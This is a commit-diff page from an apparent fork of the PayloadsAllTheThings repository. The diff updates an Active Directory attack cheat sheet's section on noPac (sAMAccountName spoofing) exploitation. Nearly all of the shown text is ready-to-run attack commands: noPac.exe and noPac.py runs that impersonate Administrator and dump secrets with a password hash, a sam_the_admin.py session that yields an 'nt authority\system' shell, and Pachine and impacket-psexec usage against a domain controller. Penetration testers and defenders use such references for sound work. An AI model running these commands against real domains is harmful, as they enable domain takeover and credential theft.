ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-01-31 07:27:25 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Github Pages Trigger

Browse Source
This commit is contained in:
Swissky 2023-02-11 20:22:28 +01:00
parent 2089c5efb1
commit c08949fdc2
1 changed files with 12 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

20
Methodology and Resources/Active Directory Attack.md
View File

@ -842,15 +842,19 @@ cme smb -u user -p password -d domain.local -M webdav [TARGET]
Automated exploitation: Automated exploitation:
* [noPac - @cube0x0](https://github.com/cube0x0/noPac) * [cube0x0/noPac](https://github.com/cube0x0/noPac) - Windows
```powershell ```powershell
noPac.exe scan -domain htb.local -user user -pass 'password123' noPac.exe scan -domain htb.local -user user -pass 'password123'
noPac.exe -domain htb.local -user domain_user -pass 'Password123!' /dc dc.htb.local /mAccount demo123 /mPassword Password123! /service cifs /ptt noPac.exe -domain htb.local -user domain_user -pass 'Password123!' /dc dc.htb.local /mAccount demo123 /mPassword Password123! /service cifs /ptt
noPac.exe -domain htb.local -user domain_user -pass "Password123!" /dc dc.htb.local /mAccount demo123 /mPassword Password123! /service ldaps /ptt /impersonate Administrator noPac.exe -domain htb.local -user domain_user -pass "Password123!" /dc dc.htb.local /mAccount demo123 /mPassword Password123! /service ldaps /ptt /impersonate Administrator
``` ```
* [sam_the_admin - @WazeHell](https://github.com/WazeHell/sam-the-admin) * [Ridter/noPac](https://github.com/Ridter/noPac) - Linux
```ps1
python noPac.py 'domain.local/user' -hashes ':31d6cfe0d16ae931b73c59d7e0c089c0' -dc-ip 10.10.10.10 -use-ldap -dump
```
* [WazeHell/sam-the-admin](https://github.com/WazeHell/sam-the-admin)
```ps1 ```ps1
$ python3 sam_the_admin.py "caltech/alice.cassie:Lee@tPass" -dc-ip 192.168.1.110 -shell $ python3 sam_the_admin.py "domain/user:password" -dc-ip 10.10.10.10 -shell
[*] Selected Target dc.caltech.white [*] Selected Target dc.caltech.white
[*] Total Domain Admins 11 [*] Total Domain Admins 11
[*] will try to impersonat gaylene.dreddy [*] will try to impersonat gaylene.dreddy
@ -871,15 +875,15 @@ Automated exploitation:
C:\Windows\system32>whoami C:\Windows\system32>whoami
nt authority\system nt authority\system
``` ```
* [Pachine - @ly4k](https://github.com/ly4k/Pachine) * [ly4k/Pachine](https://github.com/ly4k/Pachine)
```powershell ```powershell
usage: pachine.py [-h] [-scan] [-spn SPN] [-impersonate IMPERSONATE] [-domain-netbios NETBIOSNAME] [-computer-name NEW-COMPUTER-NAME$] [-computer-pass password] [-debug] [-method {SAMR,LDAPS}] [-port {139,445,636}] [-baseDN DC=test,DC=local] usage: pachine.py [-h] [-scan] [-spn SPN] [-impersonate IMPERSONATE] [-domain-netbios NETBIOSNAME] [-computer-name NEW-COMPUTER-NAME$] [-computer-pass password] [-debug] [-method {SAMR,LDAPS}] [-port {139,445,636}] [-baseDN DC=test,DC=local]
[-computer-group CN=Computers,DC=test,DC=local] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] -dc-host hostname [-dc-ip ip] [-computer-group CN=Computers,DC=test,DC=local] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] -dc-host hostname [-dc-ip ip]
[domain/]username[:password] [domain/]username[:password]
$ python3 pachine.py -dc-host dc.predator.local -scan 'predator.local/john:Passw0rd!' $ python3 pachine.py -dc-host dc.domain.local -scan 'domain.local/john:Passw0rd!'
$ python3 pachine.py -dc-host dc.predator.local -spn cifs/dc.predator.local -impersonate administrator 'predator.local/john:Passw0rd!' $ python3 pachine.py -dc-host dc.domain.local -spn cifs/dc.domain.local -impersonate administrator 'domain.local/john:Passw0rd!'
$ export KRB5CCNAME=$PWD/administrator@predator.local.ccache $ export KRB5CCNAME=$PWD/administrator@domain.local.ccache
$ impacket-psexec -k -no-pass 'predator.local/administrator@dc.predator.local' $ impacket-psexec -k -no-pass 'domain.local/administrator@dc.domain.local'
``` ```
**Mitigations**: **Mitigations**: